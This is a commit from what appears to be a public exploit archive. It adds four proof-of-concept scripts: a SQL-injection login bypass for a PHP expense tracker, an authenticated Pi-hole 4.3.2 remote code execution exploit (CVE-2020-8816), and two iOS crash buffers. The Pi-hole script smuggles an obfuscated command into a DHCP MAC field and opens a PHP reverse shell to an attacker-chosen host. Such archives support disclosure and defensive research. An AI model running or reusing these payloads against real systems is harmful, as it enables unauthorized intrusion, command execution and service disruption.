DB: 2020-08-05

4 changes to exploits/shellcodes Mocha Telnet Lite for iOS 4.2 - 'User' Denial of Service (PoC) RTSP for iOS 1.0 - 'IP Address' Denial of Service (PoC) Pi-hole 4.3.2 - Remote Code Execution (Authenticated) Daily Expenses Management System 1.0 - 'username' SQL Injection
2020-08-05 05:01:47 +00:00 · 2020-08-05 05:01:47 +00:00 · 9384c59418
commit 9384c59418
parent 3e56299335
5 changed files with 178 additions and 0 deletions
--- a/exploits/php/webapps/48730.py
+++ b/exploits/php/webapps/48730.py
@ -0,0 +1,47 @@
+# Exploit Title: Daily Expenses Management System 1.0 - 'username' SQL Injection
+# Exploit Author: Daniel Ortiz
+# Date: 2020-08-01
+# Vendor Homepage: https://www.sourcecodester.com/php/14372/daily-tracker-system-phpmysql.html
+# Tested on: XAMPP Version 5.6.40 / Windows 10
+# Software Link:  https://www.sourcecodester.com/php/14372/daily-tracker-system-phpmysql.html
+
+import sys
+import requests
+import urllib3
+import re
+import time
+
+
+urllib3.disable_warnings(urllib3.exceptions.InsecurePlatformWarning)
+
+def make_request(url, payload):
+    
+    p = {"http":"127.0.0.1:8080", "https": "127.0.0.1:8080"}
+    s = requests.Session()
+    r = s.post(url, data=payload, proxies=p)
+    return r
+
+if __name__ == '__main__':
+
+    if len(sys.argv) != 2:
+        print("[*] Daily Expenses Management System | username SQL injection")
+        print("[*] usage: %s  TARGET" % sys.argv[0])
+        print("[*] e.g: %s  192.168.0.10" % sys.argv[0]) 
+        sys.exit(-1)
+
+    TARGET = sys.argv[1]
+    LOGIN_FORM = "http://%s/dets/" % TARGET
+    
+    
+    # Step 1 - Bypass login form
+
+    url = LOGIN_FORM
+    p1 = {'email': "admin' or '1'='1'#", 'password': 'admin', 'login': 'login'} 
+    r = make_request(url, p1)
+    print("[+] Endpoint: %s") % LOGIN_FORM
+    print("[+] Making requests with payload: %s") % p1
+
+    if re.findall('Dashboard', r.text):
+        print("[+] Target vulnerable")
+    else:
+        print("[-] Error !!!")
--- a/exploits/python/webapps/48727.py
+++ b/exploits/python/webapps/48727.py
@ -0,0 +1,74 @@
+#!/usr/bin/env python2
+
+# Exploit Title: Pi-hole 4.3.2 - Remote Code Execution (Authenticated) 
+# Date: 2020-08-04
+# Exploit Author: Luis Vacas @CyberVaca
+# Vendor Homepage: https://pi-hole.net/
+# Software Link: https://github.com/pi-hole/pi-hole
+# Version: >= 4.3.2
+# Tested on: Ubuntu 19.10
+# CVE : CVE-2020-8816
+# Twitter: https://twitter.com/cybervaca_
+
+import requests
+import argparse
+import base64
+
+class Color:
+    PURPLE = '\033[95m'
+    CYAN = '\033[96m'
+    DARKCYAN = '\033[36m'
+    BLUE = '\033[94m'
+    GREEN = '\033[92m'
+    YELLOW = '\033[93m'
+    RED = '\033[91m'
+    BOLD = '\033[1m'
+    UNDERLINE = '\033[4m'
+    END = '\033[0m'
+
+def informa(msg):
+    print (Color.GREEN + "[" + Color.RED + "+" + Color.GREEN + "] " +  msg )
+
+def get_args():
+    parser = argparse.ArgumentParser(description='CVE-2020-8816 Pi-hole RCE authenticated by @CyberVaca_')
+    parser.add_argument('-u', dest='url', type=str, required=True, help="URL Target")
+    parser.add_argument('-p', dest='port', type=str, required=True, help="LPORT")
+    parser.add_argument('-i', dest='ip', type=str, required=True, help='LHOST')
+    parser.add_argument('-pass', dest='password', type=str, required=True, help='Password')
+    return parser.parse_args()
+
+banner = base64.b64decode("4pWU4pWQ4pWX4pSsIOKUrOKUjOKUkOKUjCAg4pWU4pWQ4pWX4pSs4pSsIOKUrOKUjOKUgOKUkOKUrCAg4pSM4pSA4pSQCuKVoOKVkOKVneKUguKUguKUguKUguKUguKUgiAg4pWg4pWQ4pWd4pSC4pSc4pSA4pSk4pSCIOKUguKUgiAg4pSc4pSkCuKVqSAg4pSU4pS04pSY4pSY4pSU4pSYICDilakgIOKUtOKUtCDilLTilJTilIDilJjilLTilIDilJjilJTilIDilJgKICAgICAgYnkgQEN5YmVyVmFjYQo=")
+
+
+def login(url,password):
+	session = requests.Session()
+	paramsGet = {"login":""}
+	paramsPost = {"pw":password}
+	headers = {"Origin":url,"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8","Upgrade-Insecure-Requests":"1","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0","Connection":"close","Referer":url + "/admin/index.php?login","Accept-Language":"es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3","Accept-Encoding":"gzip, deflate","Content-Type":"application/x-www-form-urlencoded"}
+	cookies = {"PHPSESSID":"cabesha"}
+	response = session.post(url + "/admin/index.php", data=paramsPost, params=paramsGet, headers=headers, cookies=cookies, allow_redirects=False)
+        token = response.content.split("<!-- Send token to JS -->")[0].split("<!-- /JS Warning -->")[1].split('</div><script src="scripts/pi-hole/js/header.js"></script>')[0].split("<div id='token' hidden>")[1]
+        return token
+
+def shell_reverse(url,token,payload):
+	session = requests.Session()
+	paramsGet = {"tab":"piholedhcp"}
+	paramsPost = {"AddMAC":"aaaaaaaaaaaa&&W=\x24{PATH\x23/???/}&&P=\x24{W%%?????:*}&&X=\x24{PATH\x23/???/??}&&H=\x24{X%%???:*}&&Z=\x24{PATH\x23*:/??}&&R=\x24{Z%%/*}&&\x24P\x24H\x24P\x24IFS-\x24R\x24IFS'EXEC(HEX2BIN(\"" + str(payload).upper() + "\"));'&&","field":"DHCP","AddIP":"192.168.1.0","AddHostname":"192.168.1.23","addstatic":"","token":token}
+	headers = {"Origin":url,"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8","Upgrade-Insecure-Requests":"1","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0","Connection":"close","Referer":"http://172.31.11.3/admin/settings.php?tab=piholedhcp","Accept-Language":"es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3","Accept-Encoding":"gzip, deflate","Content-Type":"application/x-www-form-urlencoded"}
+	cookies = {"PHPSESSID":"cabesha"}
+	response = session.post(url + "/admin/settings.php", data=paramsPost, params=paramsGet, headers=headers, cookies=cookies)
+
+def generate_shell(ip,port):
+    payload = "php -r '$sock=fsockopen(\"LHOST\", LPORT);exec(\"/bin/sh -i <&3 >&3 2>&3\");'".replace("LHOST",ip).replace("LPORT",port)
+    informa("Payload: " + Color.END + payload)
+    payload = payload.encode("hex")
+    return payload
+
+if __name__ == '__main__':
+    print(Color.RED + banner + Color.END)
+    args = get_args()
+    token = login(args.url,args.password)
+    informa("Token: " + Color.END + token)
+    payload = generate_shell(args.ip,args.port)
+    informa("Sending Payload..." + Color.END)
+    shell_reverse(args.url,token,payload)
--- a/exploits/windows/dos/48728.py
+++ b/exploits/windows/dos/48728.py
@ -0,0 +1,27 @@
+# Exploit Title: Mocha Telnet Lite for iOS 4.2 - 'User' Denial of Service (PoC)
+# Discovery by: Luis Martinez
+# Discovery Date: 2020-08-03
+# Vendor Homepage: https://apps.apple.com/us/app/telnet-lite/id286893976
+# Software Link: App Store for iOS devices
+# Tested Version: 4.2
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: iPhone 7 iOS 13.5.1
+
+# Steps to Produce the Crash:
+# 1.- Run python code: Mocha_Telnet_Lite_for_iOS_4.2.py
+# 2.- Copy content to clipboard
+# 3.- Open "Mocha Telnet Lite for iOS"
+# 4.- Configure
+# 5.- Clic New ... Add a configuration
+# 6.- IP Address > "192.168.1.1"
+# 7.- Paste ClipBoard on "User"
+# 8.- Password > "l4m5"
+# 9.- Clic Back
+# 10.- Click Back
+# 11.- Connect
+# 12.- Crashed
+
+#!/usr/bin/env python
+
+buffer = "\x41" * 350
+print (buffer)
--- a/exploits/windows/dos/48729.py
+++ b/exploits/windows/dos/48729.py
@ -0,0 +1,26 @@
+# Exploit Title: RTSP for iOS 1.0 - 'IP Address' Denial of Service (PoC)
+# Author: Luis Martinez
+# Discovery Date: 2020-08-03
+# Vendor Homepage: https://appadvice.com/app/rtsp-viewer/1056996189
+# Software Link: App Store for iOS devices
+# Tested Version: 1.0
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: iPhone 7 iOS 13.5.1
+
+# Steps to Produce the Crash:
+# 1.- Run python code: RTSP_Viewer_for_iOS_1.0.py
+# 2.- Copy content to clipboard
+# 3.- Open "RTSP Viewer for iOS"
+# 4.- Touch the screen
+# 5.- Clic add (+)
+# 6.- Name > "l4m5"
+# 7.- Paste ClipBoard on "IP Address"
+# 8.- Clic Back
+# 9.- Message save is successed > OK
+# 10.- Click created connection (AAAA...)
+# 11.- Crashed
+
+#!/usr/bin/env python
+
+buffer = "\x41" * 450
+print (buffer)
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -6755,6 +6755,8 @@ id,file,description,date,author,type,platform,port
 48637,exploits/windows/dos/48637.py,"Fire Web Server 0.1 - Remote Denial of Service (PoC)",2020-07-06,"Saeed reza Zamanian",dos,windows,
 48638,exploits/linux/dos/48638.sh,"Grafana 7.0.1 - Denial of Service (PoC)",2020-07-06,mostwanted002,dos,linux,
 48697,exploits/windows/dos/48697.py,"Calavera UpLoader 3.5 - 'FTP Logi' Denial of Service (PoC + SEH Overwrite)",2020-07-26,"Felipe Winsnes",dos,windows,
+48728,exploits/windows/dos/48728.py,"Mocha Telnet Lite for iOS 4.2 - 'User' Denial of Service (PoC)",2020-08-04,"Luis Martínez",dos,windows,
+48729,exploits/windows/dos/48729.py,"RTSP for iOS 1.0 - 'IP Address' Denial of Service (PoC)",2020-08-04,"Luis Martínez",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -42968,3 +42970,5 @@ id,file,description,date,author,type,platform,port
 48723,exploits/hardware/webapps/48723.sh,"Cisco Adaptive Security Appliance Software 9.7 - Unauthenticated Arbitrary File Deletion",2020-07-29,0xmmnbassel,webapps,hardware,
 48724,exploits/php/webapps/48724.txt,"Wordpress Plugin Maintenance Mode by SeedProd 5.1.1 - Persistent Cross-Site Scripting",2020-07-29,"Jinson Varghese Behanan",webapps,php,
 48725,exploits/php/webapps/48725.txt,"Online Shopping Alphaware 1.0 - Authentication Bypass",2020-07-30,"Ahmed Abbas",webapps,php,
+48727,exploits/python/webapps/48727.py,"Pi-hole 4.3.2 - Remote Code Execution (Authenticated)",2020-08-04,"Luis Vacacas",webapps,python,
+48730,exploits/php/webapps/48730.py,"Daily Expenses Management System 1.0 - 'username' SQL Injection",2020-08-04,"Daniel Ortiz",webapps,php,